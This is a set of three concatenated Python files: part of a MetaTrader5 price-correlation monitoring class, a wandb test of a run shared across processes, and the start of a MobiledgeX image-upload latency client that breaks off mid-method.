# Flag to determine we monitor and report on inverse correlations
monitor_inverse = False
# Toggle on whether we are monitoring or not. Set through start_monitor and stop_monitor
__monitoring = False
# Monitoring calculation params, interval, cache_time, autosave and filename. Passed to start_monitor
__monitoring_params = []
__interval = None
__cache_time = None
__autosave = None
__filename = None
# First run of scheduler
__first_run = True
# The price data used to calculate the correlations
__price_data = None
# Coefficient data and history. Will be created in init call to __reset_coefficient_data
coefficient_data = None
coefficient_history = None
# Stores tick data used to calculate coefficient during Monitor.
# Dict: {Symbol: [retrieved datetime, ticks dataframe]}
__monitor_tick_data = {}
def __init__(self, monitoring_threshold=0.9, divergence_threshold=0.8, monitor_inverse=False):
"""
Initialises the Correlation class.
:param monitoring_threshold: Only correlations that are greater than or equal to this threshold will be
monitored.
:param divergence_threshold: Correlations that are being monitored and fall below this threshold are considered
to have diverged.
:param monitor_inverse: Whether we will monitor and report on negative / inverse correlations.
"""
# Logger
self.__log = logging.getLogger(__name__)
# Connection to MetaTrader5
self.__mt5 = MT5()
# Create dataframe for coefficient data
self.__reset_coefficient_data()
# Create timer for continuous monitoring
self.__scheduler = sched.scheduler(time.time, time.sleep)
# Set thresholds and flags
self.monitoring_threshold = monitoring_threshold
self.divergence_threshold = divergence_threshold
self.monitor_inverse = monitor_inverse
@property
def filtered_coefficient_data(self):
"""
:return: Coefficient data filtered so that all base coefficients >= monitoring_threshold
"""
filtered_data = None
if self.coefficient_data is not None:
if self.monitor_inverse:
filtered_data = self.coefficient_data \
.loc[(self.coefficient_data['Base Coefficient'] >= self.monitoring_threshold) |
(self.coefficient_data['Base Coefficient'] <= self.monitoring_threshold * -1)]
else:
filtered_data = self.coefficient_data.loc[self.coefficient_data['Base Coefficient'] >=
self.monitoring_threshold]
return filtered_data
@property
def diverged_symbols(self):
"""
:return: dataframe containing all diverged, diverging or converging symbols and count of number of
divergences for those symbols.
"""
filtered_data = None
if self.coefficient_data is not None:
# Only rows where we have a divergence
filtered_data = self.coefficient_data \
.loc[(self.coefficient_data['Status'] == STATUS_DIVERGED) |
(self.coefficient_data['Status'] == STATUS_DIVERGING) |
(self.coefficient_data['Status'] == STATUS_CONVERGING)]
# We only need the symbols
all_symbols = pd.DataFrame(columns=['Symbol', 'Count'],
data={'Symbol': filtered_data['Symbol 1'].append(filtered_data['Symbol 2']),
'Count': 1})
# Group and count. Reset index so that we have named SYMBOL column.
filtered_data = all_symbols.groupby(by='Symbol').count().reset_index()
# Sort
filtered_data = filtered_data.sort_values('Count', ascending=False)
return filtered_data
def load(self, filename):
"""
Loads calculated coefficients, the price data used to calculate them, and the tick data used during monitoring.
:param filename: The filename for the coefficient data to load.
:return:
"""
# Load data
with open(filename, 'rb') as file:
loaded_dict = pickle.load(file)
# Get data from loaded dict and save
self.coefficient_data = loaded_dict["coefficient_data"]
self.__price_data = loaded_dict["price_data"]
self.__monitor_tick_data = loaded_dict["monitor_tick_data"]
self.coefficient_history = loaded_dict["coefficient_history"]
def save(self, filename):
"""
Saves the calculated coefficients, the price data used to calculate and the tick data for monitoring to a file.
:param filename: The filename to save the data to.
:return:
"""
# Add data to dict then use pickle to save
save_dict = {"coefficient_data": self.coefficient_data, "price_data": self.__price_data,
"monitor_tick_data": self.__monitor_tick_data, "coefficient_history": self.coefficient_history}
with open(filename, 'wb') as file:
pickle.dump(save_dict, file, protocol=pickle.HIGHEST_PROTOCOL)
def calculate(self, date_from, date_to, timeframe, min_prices=100, max_set_size_diff_pct=90, overlap_pct=90,
max_p_value=0.05):
"""
Calculates correlation coefficient between all symbols in MetaTrader5 Market Watch. Updates coefficient data.
:param date_from: From date for price data from which to calculate correlation coefficients
:param date_to: To date for price data from which to calculate correlation coefficients
:param timeframe: Timeframe for price data from which to calculate correlation coefficients
:param min_prices: The minimum number of prices that should be used to calculate coefficient. If this threshold
is not met then returned coefficient will be None
:param max_set_size_diff_pct: Correlations will only be calculated if the sizes of the two price data sets are
within this pct of each other
:param overlap_pct: The dates and times in the two sets of data must match. The coefficient will only be
calculated against the dates that overlap. Any non overlapping dates will be discarded. This setting
specifies the minimum size of the overlapping data when compared to the smallest set as a %. A coefficient
will not be calculated if this threshold is not met.
:param max_p_value: The maximum p value for the correlation to be meaningful
:return:
"""
coefficient = None
# If we are monitoring, stop. We will need to restart later
was_monitoring = self.__monitoring
if self.__monitoring:
self.stop_monitor()
# Clear the existing correlations
self.__reset_coefficient_data()
# Get all visible symbols
symbols = self.__mt5.get_symbols()
# Get price data for selected symbols. 1 week of 15 min OHLC data for each symbol. Add to dict.
self.__price_data = {}
for symbol in symbols:
self.__price_data[symbol] = self.__mt5.get_prices(symbol=symbol, from_date=date_from, to_date=date_to,
timeframe=timeframe)
# Loop through all symbol pair combinations and calculate coefficient. Make sure you don't double count pairs
# eg. (USD/GBP AUD/USD vs AUD/USD USD/GBP). Use grid of all symbols with i and j axis. j starts at i + 1 to
# avoid duplicating. We will store all coefficients in a dataframe.
index = 0
# There will be (x^2 - x) / 2 pairs where x is number of symbols
num_pair_combinations = int((len(symbols) ** 2 - len(symbols)) / 2)
for i in range(0, len(symbols)):
symbol1 = symbols[i]
for j in range(i + 1, len(symbols)):
symbol2 = symbols[j]
index += 1
# Get price data for both symbols
symbol1_price_data = self.__price_data[symbol1]
symbol2_price_data = self.__price_data[symbol2]
# Get coefficient
if symbol1_price_data is not None and symbol2_price_data is not None:
coefficient = self.calculate_coefficient(symbol1_prices=symbol1_price_data,
symbol2_prices=symbol2_price_data,
min_prices=min_prices,
max_set_size_diff_pct=max_set_size_diff_pct,
overlap_pct=overlap_pct, max_p_value=max_p_value)
# Store if valid
if coefficient is not None:
self.coefficient_data = \
self.coefficient_data.append({'Symbol 1': symbol1, 'Symbol 2': symbol2,
'Base Coefficient': coefficient, 'UTC Date From': date_from,
'UTC Date To': date_to, 'Timeframe': timeframe, 'Status': ''},
ignore_index=True)
self.__log.debug(f"Pair {index} of {num_pair_combinations}: {symbol1}:{symbol2} has a "
f"coefficient of {coefficient}.")
else:
self.__log.debug(f"Coefficient for pair {index} of {num_pair_combinations}: {symbol1}:"
f"{symbol2} could no be calculated.")
# Sort, highest correlated first
self.coefficient_data = self.coefficient_data.sort_values('Base Coefficient', ascending=False)
# If we were monitoring, we stopped, so start again.
if was_monitoring:
self.start_monitor(interval=self.__interval, calculation_params=self.__monitoring_params,
cache_time=self.__cache_time, autosave=self.__autosave, filename=self.__filename)
def get_price_data(self, symbol):
"""
Returns the price data used to calculate the base coefficients for the specified symbol
:param symbol: Symbol to get price data for.
:return: price data
"""
price_data = None
if symbol in self.__price_data:
price_data = self.__price_data[symbol]
return price_data
def start_monitor(self, interval, calculation_params, cache_time=10, autosave=False, filename='autosave.cpd'):
"""
Starts the monitor to continuously update the coefficient for all symbol pairs that meet the monitoring
threshold.
:param interval: How often to check in seconds
:param calculation_params: A single dict or list of dicts containing the parameters for the coefficient
calculations. On every iteration, a coefficient will be calculated for every set of params in list. Params
contain the following values:
from: The number of minutes of tick data to use for calculation. This can be a single value or
a list. If a list, then calculations will be performed for every from date in list.
min_prices: The minimum number of prices that should be used to calculate coefficient. If this threshold
is not met then returned coefficient will be None
max_set_size_diff_pct: Correlations will only be calculated if the sizes of the two price data sets are
within this pct of each other
overlap_pct: The dates and times in the two sets of data must match. The coefficient will only be
calculated against the dates that overlap. Any non overlapping dates will be discarded. This
setting specifies the minimum size of the overlapping data when compared to the smallest set as a %.
A coefficient will not be calculated if this threshold is not met.
max_p_value: The maximum p value for the correlation to be meaningful
:param cache_time: Tick data is cached so that we can check coefficients for multiple symbol pairs and reuse
the tick data. Number of seconds to cache tick data for before it becomes stale.
:param autosave: Whether to autosave after every monitor run. If there is no filename specified then will
create one named autosave.cpd
:param filename: Filename for autosave. Default is autosave.cpd.
        :return:
"""
if self.__monitoring:
self.__log.debug(f"Request to start monitor when monitor is already running. Monitor will be stopped and"
f"restarted with new parameters.")
self.stop_monitor()
self.__log.debug(f"Starting monitor.")
self.__monitoring = True
# Store the calculation params. If it isn't a list, convert to list of one to make code simpler later on.
self.__monitoring_params = calculation_params if isinstance(calculation_params, list) \
else [calculation_params, ]
# Store the other params. We will need these later if monitor is stopped and needs to be restarted. This
# happens in calculate.
self.__interval = interval
self.__cache_time = cache_time
self.__autosave = autosave
self.__filename = filename
        # Create thread to run monitoring. This will call the private __monitor method that will run the calculation and
# keep scheduling itself while self.monitoring is True.
thread = threading.Thread(target=self.__monitor)
thread.start()
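    # Hypothetical usage sketch (illustrative only; the instance name `monitor` and all
    # parameter values are assumptions, not taken from this module):
    #
    #   params = [{'from': 15, 'min_prices': 100, 'max_set_size_diff_pct': 90,
    #              'overlap_pct': 90, 'max_p_value': 0.05},
    #             {'from': 60, 'min_prices': 100, 'max_set_size_diff_pct': 90,
    #              'overlap_pct': 90, 'max_p_value': 0.05}]
    #   monitor.start_monitor(interval=60, calculation_params=params, cache_time=10,
    #                         autosave=True, filename='autosave.cpd')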
def stop_monitor(self):
"""
Stops monitoring symbol pairs for correlation.
:return:
"""
if self.__monitoring:
self.__log.debug(f"Stopping monitor.")
self.__monitoring = False
else:
self.__log.debug(f"Request to stop monitor when it is not running. No action taken.")
def calculate_coefficient(self, symbol1_prices, symbol2_prices, min_prices: int = 100,
max_set_size_diff_pct: int = 90, overlap_pct: int = 90,
max_p_value: float = 0.05):
"""
Calculates the correlation coefficient between two sets of price data. Uses close price.
:param symbol1_prices: Pandas dataframe containing prices for symbol 1
:param symbol2_prices: Pandas dataframe containing prices for symbol 2
:param min_prices: The minimum number of prices that should be used to calculate coefficient. If this threshold
is not met then returned coefficient will be None
:param max_set_size_diff_pct: Correlations will only be calculated if the sizes of the two price data sets are
within this pct of each other
        :param overlap_pct: The minimum size of the overlapping (matching timestamp) data, as a % of the smallest
            set, required for the coefficient to be calculated
:param max_p_value: The maximum p value for the correlation to be meaningful
:return: correlation coefficient, or None if coefficient could not be calculated.
:rtype: float or None
"""
assert symbol1_prices is not None and symbol2_prices is not None
# Calculate size of intersection and determine if prices for symbols have enough overlapping timestamps for
# correlation coefficient calculation to be meaningful. Is the smallest set at least max_set_size_diff_pct % of
# the size of the largest set and is the overlap set size at least overlap_pct % the size of the smallest set?
coefficient = None
intersect_dates = (set(symbol1_prices['time']) & set(symbol2_prices['time']))
len_smallest_set = int(min([len(symbol1_prices.index), len(symbol2_prices.index)]))
len_largest_set = int(max([len(symbol1_prices.index), len(symbol2_prices.index)]))
similar_size = len_largest_set * (max_set_size_diff_pct / 100) <= len_smallest_set
enough_overlap = len(intersect_dates) >= len_smallest_set * (overlap_pct / 100)
enough_prices = len_smallest_set >= min_prices
suitable = similar_size and enough_overlap and enough_prices
if suitable:
# Calculate coefficient on close prices
# First filter prices to only include those that intersect
symbol1_prices_filtered = symbol1_prices[symbol1_prices['time'].isin(intersect_dates)]
symbol2_prices_filtered = symbol2_prices[symbol2_prices['time'].isin(intersect_dates)]
# Calculate coefficient. Only use if p value is < max_p_value (highly likely that coefficient is valid
# and null hypothesis is false).
coefficient_with_p_value = pearsonr(symbol1_prices_filtered['close'], symbol2_prices_filtered['close'])
coefficient = None if coefficient_with_p_value[1] > max_p_value else coefficient_with_p_value[0]
# If NaN, change to None
if coefficient is not None and math.isnan(coefficient):
coefficient = None
self.__log.debug(f"Calculate coefficient returning {coefficient}. "
f"Symbol 1 Prices: {len(symbol1_prices)} Symbol 2 Prices: {len(symbol2_prices)} "
f"Overlap Prices: {len(intersect_dates)} Similar size: {similar_size} "
f"Enough overlap: {enough_overlap} Enough prices: {enough_prices} Suitable: {suitable}.")
return coefficient
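    # Worked example of the suitability checks above (illustrative numbers only): with
    # min_prices=100, max_set_size_diff_pct=90 and overlap_pct=90, price sets of 950 and
    # 1000 rows sharing 900 timestamps are suitable because 1000 * 0.9 <= 950,
    # 900 >= 950 * 0.9 and 950 >= 100.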
def get_coefficient_history(self, filters=None):
"""
Returns the coefficient history that matches the supplied filter.
:param filters: Dict of all filters to apply. Possible values in dict are:
Symbol 1
Symbol 2
Coefficient
Timeframe
Date From
Date To
If filter is not supplied, then all history is returned.
:return: dataframe containing history of coefficient data.
"""
history = self.coefficient_history
# Apply filters
if filters is not None:
for key in filters:
if key in history.columns:
history = history[history[key] == filters[key]]
else:
self.__log.warning(f"Invalid column name provided for filter. Filter column: {key} "
f"Valid columns: {history.columns}")
return history
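    # Hypothetical usage sketch (the instance name and symbol names are illustrative assumptions):
    #
    #   history = monitor.get_coefficient_history(
    #       filters={'Symbol 1': 'EURUSD', 'Symbol 2': 'GBPUSD', 'Timeframe': 15})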
def clear_coefficient_history(self):
"""
Clears the coefficient history for all symbol pairs
:return:
"""
# Create dataframes for coefficient history.
coefficient_history_columns = ['Symbol 1', 'Symbol 2', 'Coefficient', 'Timeframe', 'Date To']
self.coefficient_history = pd.DataFrame(columns=coefficient_history_columns)
# Clear tick data
self.__monitor_tick_data = {}
# Clear status from coefficient data
self.coefficient_data['Status'] = ''
def get_ticks(self, symbol, date_from=None, date_to=None, cache_only=False):
"""
        Returns the ticks for the specified symbol. Gets the ticks from cache if available and not older than cache_time.
:param symbol: Name of symbol to get ticks for.
:param date_from: Date to get ticks from. Can only be None if getting from cache (cache_only=True)
        :param date_to: Date to get ticks to. Can only be None if getting from cache (cache_only=True)
:param cache_only: Only retrieve from cache. cache_time is ignored. Returns None if symbol is not available in
cache.
:return:
"""
timezone = pytz.timezone("Etc/UTC")
utc_now = datetime.now(tz=timezone)
ticks = None
# Cache only
if cache_only:
if symbol in self.__monitor_tick_data:
ticks = self.__monitor_tick_data[symbol][1]
# Check if we have a cache time defined, if we already have the tick data and it is not stale
elif self.__cache_time is not None and symbol in self.__monitor_tick_data and utc_now < \
self.__monitor_tick_data[symbol][0] + timedelta(seconds=self.__cache_time):
# Cached ticks are not stale. Get them
ticks = self.__monitor_tick_data[symbol][1]
self.__log.debug(f"Ticks for {symbol} retrieved from cache.")
else:
# Data does not exist in cache or cached data is stale. Retrieve from source and cache.
ticks = self.__mt5.get_ticks(symbol=symbol, from_date=date_from, to_date=date_to)
self.__monitor_tick_data[symbol] = [utc_now, ticks]
self.__log.debug(f"Ticks for {symbol} retrieved from source and cached.")
return ticks
def get_last_status(self, symbol1, symbol2):
"""
Get the last status for the specified symbol pair.
:param symbol1
:param symbol2
:return: CorrelationStatus instance for symbol pair
"""
status_col = self.coefficient_data.loc[(self.coefficient_data['Symbol 1'] == symbol1) &
(self.coefficient_data['Symbol 2'] == symbol2), 'Status']
status = status_col.values[0]
return status
def get_last_calculation(self, symbol1=None, symbol2=None):
"""
        Get the last calculation time for the specified symbol pair. If no symbols are specified, then gets the last
calculation time across all pairs
:param symbol1
:param symbol2
:return: last calculation time
"""
last_calc = None
if self.coefficient_data is not None and len(self.coefficient_data.index) > 0:
data = self.coefficient_data.copy()
# Filter by symbols if specified
data = data.loc[data['Symbol 1'] == symbol1] if symbol1 is not None else data
data = data.loc[data['Symbol 2'] == symbol2] if symbol2 is not None else data
# Filter to remove blank dates
data = data.dropna(subset=['Last Calculation'])
# Get the column
col = data['Last Calculation']
# Get max date from column
if col is not None and len(col) > 0:
last_calc = max(col.values)
return last_calc
def get_base_coefficient(self, symbol1, symbol2):
"""
Returns the base coefficient for the specified symbol pair
:param symbol1:
:param symbol2:
:return:
"""
base_coefficient = None
if self.coefficient_data is not None:
row = self.coefficient_data[(self.coefficient_data['Symbol 1'] == symbol1) &
(self.coefficient_data['Symbol 2'] == symbol2)]
if row is not None and len(row) == 1:
base_coefficient = row.iloc[0]['Base Coefficient']
return base_coefficient
def __monitor(self):
"""
        The actual monitor method. Private. This should not be called outside of this class. Use start_monitor and
        stop_monitor.
        :return:
"""
self.__log.debug(f"In monitor event. Monitoring: {self.__monitoring}.")
# Only run if monitor is not stopped
if self.__monitoring:
# Update all coefficients
self.__update_all_coefficients()
# Autosave
if self.__autosave:
self.save(filename=self.__filename)
# Schedule the timer to run again
self.__scheduler.enter(delay=self.__interval, priority=1, action=self.__monitor)
# Log the stack. Debug stack overflow
self.__log.debug(f"Current stack size: {len(inspect.stack())} Recursion limit: {sys.getrecursionlimit()}")
# Run
if self.__first_run:
self.__first_run = False
self.__scheduler.run()
def __update_coefficients(self, symbol1, symbol2):
"""
Updates the coefficients for the specified symbol pair
:param symbol1: Name of symbol to calculate coefficient for.
:param symbol2: Name of symbol to calculate coefficient for.
        :return:
"""
# Get the largest value of from in monitoring_params. This will be used to retrieve the data. We will only
# retrieve once and use for every set of params by getting subset of the data.
max_from = None
for params in self.__monitoring_params:
if max_from is None:
max_from = params['from']
else:
max_from = max(max_from, params['from'])
# Date range for data
timezone = pytz.timezone("Etc/UTC")
date_to = datetime.now(tz=timezone)
date_from = date_to - timedelta(minutes=max_from)
# Get the tick data for the longest timeframe calculation.
symbol1ticks = self.get_ticks(symbol=symbol1, date_from=date_from, date_to=date_to)
symbol2ticks = self.get_ticks(symbol=symbol2, date_from=date_from, date_to=date_to)
        # Resample to 1 sec OHLC, this will help with coefficient calculation ensuring that we don't have more than
# one tick per second and ensuring that times can match. We will need to set the index to time for the
# resample then revert back to a 'time' column. We will then need to remove rows with nan in 'close' price
s1_prices = None
s2_prices = None
if symbol1ticks is not None and symbol2ticks is not None and len(symbol1ticks.index) > 0 and \
len(symbol2ticks.index) > 0:
try:
symbol1ticks = symbol1ticks.set_index('time')
symbol2ticks = symbol2ticks.set_index('time')
s1_prices = symbol1ticks['ask'].resample('1S').ohlc()
s2_prices = symbol2ticks['ask'].resample('1S').ohlc()
except RecursionError:
self.__log.warning(f"Coefficient could not be calculated for {symbol1}:{symbol2}. prices could not "
f"be resampled.")
else:
s1_prices.reset_index(inplace=True)
s2_prices.reset_index(inplace=True)
s1_prices = s1_prices[s1_prices['close'].notna()]
s2_prices = s2_prices[s2_prices['close'].notna()]
# Calculate for all sets of monitoring_params
if s1_prices is not None and s2_prices is not None:
coefficients = {}
for params in self.__monitoring_params:
# Get the from date as a datetime64
date_from_subset = pd.Timestamp(date_to - timedelta(minutes=params['from'])).to_datetime64()
# Get subset of the price data
s1_prices_subset = s1_prices[(s1_prices['time'] >= date_from_subset)]
s2_prices_subset = s2_prices[(s2_prices['time'] >= date_from_subset)]
# Calculate the coefficient
coefficient = \
self.calculate_coefficient(symbol1_prices=s1_prices_subset, symbol2_prices=s2_prices_subset,
min_prices=params['min_prices'],
max_set_size_diff_pct=params['max_set_size_diff_pct'],
overlap_pct=params['overlap_pct'], max_p_value=params['max_p_value'])
self.__log.debug(f"Symbol pair {symbol1}:{symbol2} has a coefficient of {coefficient} for last "
f"{params['from']} minutes.")
                # Add the coefficient to a dict {timeframe: coefficient}. We will update all timeframes together
                # for this symbol pair and run.
coefficients[params['from']] = coefficient
# Update coefficient data for all coefficients for all timeframes for this run and symbol pair.
self.__update_coefficient_data(symbol1=symbol1, symbol2=symbol2, coefficients=coefficients,
date_to=date_to)
def __update_all_coefficients(self):
"""
        Updates the coefficient for all symbol pairs that meet the min_coefficient threshold. Symbol pairs that meet
        the threshold can be accessed through the filtered_coefficient_data property.
"""
# Update latest coefficient for every pair
for index, row in self.filtered_coefficient_data.iterrows():
symbol1 = row['Symbol 1']
symbol2 = row['Symbol 2']
self.__update_coefficients(symbol1=symbol1, symbol2=symbol2)
def __reset_coefficient_data(self):
"""
Clears coefficient data and history.
:return:
"""
# Create dataframes for coefficient data.
coefficient_data_columns = ['Symbol 1', 'Symbol 2', 'Base Coefficient', 'UTC Date From', 'UTC Date To',
'Timeframe', 'Last Calculation', 'Status']
self.coefficient_data = pd.DataFrame(columns=coefficient_data_columns)
# Clear coefficient history
self.clear_coefficient_history()
# Clear price data
self.__price_data = None
def __update_coefficient_data(self, symbol1, symbol2, coefficients, date_to):
"""
Updates the coefficient data with the latest coefficient and adds to coefficient history.
:param symbol1:
:param symbol2:
:param coefficients: Dict of all coefficients calculated for this run and symbol pair. {timeframe: coefficient}
        :param date_to: The date up to which the coefficients were calculated
:return:
"""
timezone = pytz.timezone("Etc/UTC")
now = datetime.now(tz=timezone)
# Update data if we have a coefficient and add to history
if coefficients is not None:
# Update the coefficient data table with the Last Calculation time.
self.coefficient_data.loc[(self.coefficient_data['Symbol 1'] == symbol1) &
(self.coefficient_data['Symbol 2'] == symbol2),
'Last Calculation'] = now
# Are we an inverse correlation
inverse = self.get_base_coefficient(symbol1, symbol2) <= self.monitoring_threshold * -1
# Calculate status and update
status = self.__calculate_status(coefficients=coefficients, inverse=inverse)
self.coefficient_data.loc[(self.coefficient_data['Symbol 1'] == symbol1) &
(self.coefficient_data['Symbol 2'] == symbol2),
'Status'] = status
# Update history data
for key in coefficients:
row = pd.DataFrame(columns=self.coefficient_history.columns,
data=[[symbol1, symbol2, coefficients[key], key, date_to]])
self.coefficient_history = self.coefficient_history.append(row)
def __calculate_status(self, coefficients, inverse):
"""
Calculates the status from the supplied set of coefficients
:param coefficients: Dict of timeframes and coefficients {timeframe: coefficient} to calculate status from
        :param inverse: Whether we are calculating status based on normal or inverse correlation
:return: status
"""
status = STATUS_NOT_CALCULATED
# Only continue if we have calculated all coefficients, otherwise we will return STATUS_NOT_CALCULATED
if None not in coefficients.values():
# Get the values ordered by timeframe descending
ordered_values = []
for key in sorted(coefficients, reverse=True):
ordered_values.append(coefficients[key])
if self.monitor_inverse and inverse:
# Calculation for inverse calculations
if all(i <= self.divergence_threshold * -1 for i in ordered_values):
status = STATUS_CORRELATED
elif all(i > self.divergence_threshold * -1 for i in ordered_values):
status = STATUS_DIVERGED
elif all(ordered_values[i] <= ordered_values[i+1] for i in range(0, len(ordered_values)-1, 1)):
status = STATUS_CONVERGING
elif all(ordered_values[i] > ordered_values[i+1] for i in range(0, len(ordered_values)-1, 1)):
status = STATUS_DIVERGING
else:
status = STATUS_INCONSISTENT
else:
# Calculation for standard correlations
if all(i >= self.divergence_threshold for i in ordered_values):
status = STATUS_CORRELATED
elif all(i < self.divergence_threshold for i in ordered_values):
status = STATUS_DIVERGED
elif all(ordered_values[i] <= ordered_values[i+1] for i in range(0, len(ordered_values)-1, 1)):
status = STATUS_DIVERGING
elif all(ordered_values[i] > ordered_values[i+1] for i in range(0, len(ordered_values)-1, 1)):
status = STATUS_CONVERGING
else:
status = STATUS_INCONSISTENT
return status
|
06-1-share-child-base.py
|
#!/usr/bin/env python
"""Test parent and child processes sharing a run.
Compare to a run in a single process, base usage of `run.log`"""
import multiprocessing as mp
import wandb
import yea
def process_parent():
run = wandb.init()
assert run == wandb.run
run.config.c1 = 11
run.log({"s1": 11})
return run
def process_child(run):
run.config.c2 = 22
run.log({"s1": 21})
def reference_run():
run = process_parent()
process_child(run)
run.finish()
def share_run():
run = process_parent()
p = mp.Process(target=process_child, kwargs=dict(run=run))
p.start()
p.join()
run.finish()
def main():
wandb.require("service")
reference_run()
share_run()
if __name__ == "__main__":
yea.setup() # Use ":yea:start_method:" to set mp.set_start_method()
main()
|
multi_client.py
|
# Copyright 2020 MobiledgeX, Inc. All rights and licenses reserved.
# MobiledgeX, Inc. 156 2nd Street #408, San Francisco, CA 94105
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""
Client script that can use multiple communication methods to send images to the
computervision backend and measure latency.
"""
import sys
import os
import platform
import requests
import subprocess
import re
import base64
import socket
import websocket
import ssl
import struct
import json
import time
import logging
import cv2
from threading import Thread
from utils import RunningStats
WEBSOCKET_OPCODE_BINARY = 0x2
PING_INTERVAL = 4
TEST_PASS = False
logger = logging.getLogger(__name__)
logger.setLevel(logging.DEBUG)
formatter = logging.Formatter('%(asctime)s - %(threadName)s - %(levelname)s - %(message)s')
fh = logging.FileHandler('multi_client.log')
fh.setLevel(logging.DEBUG)
fh.setFormatter(formatter)
logger.addHandler(fh)
ch = logging.StreamHandler()
ch.setLevel(logging.INFO)
ch.setFormatter(formatter)
logger.addHandler(ch)
if platform.system() == "Darwin":
PING = "/sbin/ping"
PING_REGEX = r'round-trip min/avg/max/stddev = (.*)/(.*)/(.*)/(.*) ms'
else:
PING = "/bin/ping"
PING_REGEX = r'rtt min/avg/max/mdev = (.*)/(.*)/(.*)/(.*) ms'
class Client:
""" Base Client class """
MULTI_THREADED = False
# Initialize "Grand total" class variables.
stats_latency_full_process = RunningStats()
stats_latency_network_only = RunningStats()
stats_server_processing_time = RunningStats()
def __init__(self, host, port):
# Initialize instance variables.
self.host = host
self.port = port
self.do_server_stats = False
self.show_responses = False
self.stats_latency_full_process = RunningStats()
self.stats_latency_network_only = RunningStats()
self.stats_server_processing_time = RunningStats()
self.media_file_name = None
self.latency_start_time = 0
self.loop_count = 0
self.num_repeat = 0
self.filename_list = []
self.filename_list_index = 0
self.json_params = None
self.base64 = False
self.video = None
self.resize = True
self.resize_long = 240
self.resize_short = 180
self.skip_frames = 1
logger.debug("host:port = %s:%d" %(self.host, self.port))
def start(self):
logger.debug("media file(s) %s" %(self.filename_list))
video_extensions = ('mp4', 'avi', 'mov')
if self.filename_list[0].endswith(video_extensions):
logger.debug("It's a video")
self.media_file_name = self.filename_list[0]
self.video = cv2.VideoCapture(self.media_file_name)
def get_next_image(self):
if self.video is not None:
for x in range(self.skip_frames):
ret, image = self.video.read()
if not ret:
logger.debug("End of video")
return None
vw = image.shape[1]
vh = image.shape[0]
logger.debug("Video size: %dx%d" %(vw, vh))
if self.resize:
if vw > vh:
resize_w = self.resize_long
resize_h = self.resize_short
else:
resize_w = self.resize_short
resize_h = self.resize_long
image = cv2.resize(image, (resize_w, resize_h))
logger.debug("Resized image to: %dx%d" %(resize_w, resize_h))
res, image = cv2.imencode('.JPEG', image)
            image = image.tobytes()  # tostring() is deprecated in newer NumPy releases
else:
# If the filename_list array has more than 1, get the next value.
if len(self.filename_list) > 1:
self.filename_list_index += 1
if self.filename_list_index >= len(self.filename_list):
self.filename_list_index = 0
else:
self.filename_list_index = 0
if self.stats_latency_full_process.n >= self.num_repeat:
return None
self.media_file_name = self.filename_list[self.filename_list_index]
f = open(self.media_file_name, "rb")
image = f.read()
logger.debug("Image data (first 32 bytes logged): %s" %image[:32])
return image
def get_server_stats(self):
url = "http://%s:%d%s" %(self.host, self.port, "/server/usage/")
if self.tls:
url = url.replace("http", "https", 1)
logger.info(requests.get(url).content)
def time_open_socket(self):
now = time.time()
        sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
sock.settimeout(2)
result = sock.connect_ex((self.host, self.port))
if result != 0:
logger.error("Could not connect to %s on port %d" %(self.host, self.port))
return
millis = (time.time() - now)*1000
elapsed = "%.3f" %millis
if self.show_responses:
logger.info("%s ms to open socket" %(elapsed))
self.stats_latency_network_only.push(millis)
Client.stats_latency_network_only.push(millis)
def icmp_ping(self):
args=[PING, '-c', '1', '-W', '1', self.host]
p_ping = subprocess.Popen(args,
shell=False,
stdout=subprocess.PIPE)
# save ping stdout
p_ping_out = str(p_ping.communicate()[0])
if (p_ping.wait() == 0):
logger.info(p_ping_out)
# rtt min/avg/max/mdev = 61.994/61.994/61.994/0.000 ms
search = re.search(PING_REGEX, p_ping_out, re.M|re.I)
ping_rtt = float(search.group(2))
if self.show_responses:
logger.info("%s ms ICMP ping" %(ping_rtt))
self.stats_latency_network_only.push(ping_rtt)
Client.stats_latency_network_only.push(ping_rtt)
else:
logger.error("ICMP ping failed")
def process_result(self, result):
global TEST_PASS
try:
decoded_json = json.loads(result)
except Exception as e:
logger.error("Could not decode result. Exception: %s. Result: %s" %(e, result))
TEST_PASS = False
return
if 'success' in decoded_json:
if decoded_json['success'] == "true":
TEST_PASS = True
else:
TEST_PASS = False
if 'latency_start' in decoded_json:
millis = (time.time() - decoded_json['latency_start'])*1000
self.stats_latency_network_only.push(millis)
Client.stats_latency_network_only.push(millis)
else:
millis = (time.time() - self.latency_start_time)*1000
self.stats_latency_full_process.push(millis)
Client.stats_latency_full_process.push(millis)
if 'server_processing_time' in decoded_json:
server_processing_time = decoded_json['server_processing_time']
self.stats_server_processing_time.push(float(server_processing_time))
Client.stats_server_processing_time.push(float(server_processing_time))
if self.show_responses:
elapsed = "%.3f" %millis
logger.info("%s ms to send and receive: %s" %(elapsed, result))
def display_results(self):
if not self.show_responses or not Client.MULTI_THREADED:
return
if self.stats_latency_full_process.n > 0:
logger.info("====> Average Latency Full Process=%.3f ms (stddev=%.3f)" %(self.stats_latency_full_process.mean(), self.stats_latency_full_process.stddev()))
if self.stats_latency_network_only.n > 0:
logger.info("====> Average Latency Network Only=%.3f ms (stddev=%.3f)" %(self.stats_latency_network_only.mean(), self.stats_latency_network_only.stddev()))
if self.stats_server_processing_time.n > 0:
logger.info("====> Average Server Processing Time=%.3f ms (stddev=%.3f)" %(self.stats_server_processing_time.mean(), Client.stats_server_processing_time.stddev()))
class RestClient(Client):
def __init__(self, host, port=8008):
if port is None:
port = 8008
Client.__init__(self, host, port)
def start(self):
Client.start(self)
self.url = "http://%s:%d%s" %(self.host, self.port, self.endpoint)
if self.tls:
self.url = self.url.replace("http", "https", 1)
while True:
image = self.get_next_image()
if image is None:
break
self.latency_start_time = time.time()
if self.base64:
response = self.send_image_json(image)
else:
response = self.send_image(image)
content = response.content
if response.status_code != 200:
logger.error("non-200 response: %d: %s" %(response.status_code, content))
self.num_repeat -= 1
continue
self.process_result(content)
if (self.stats_latency_full_process.n) % PING_INTERVAL == 0:
if self.do_server_stats:
self.get_server_stats()
if self.net_latency_method == "SOCKET":
self.time_open_socket()
else:
self.icmp_ping()
logger.debug("Done")
self.display_results()
def send_image(self, image):
"""
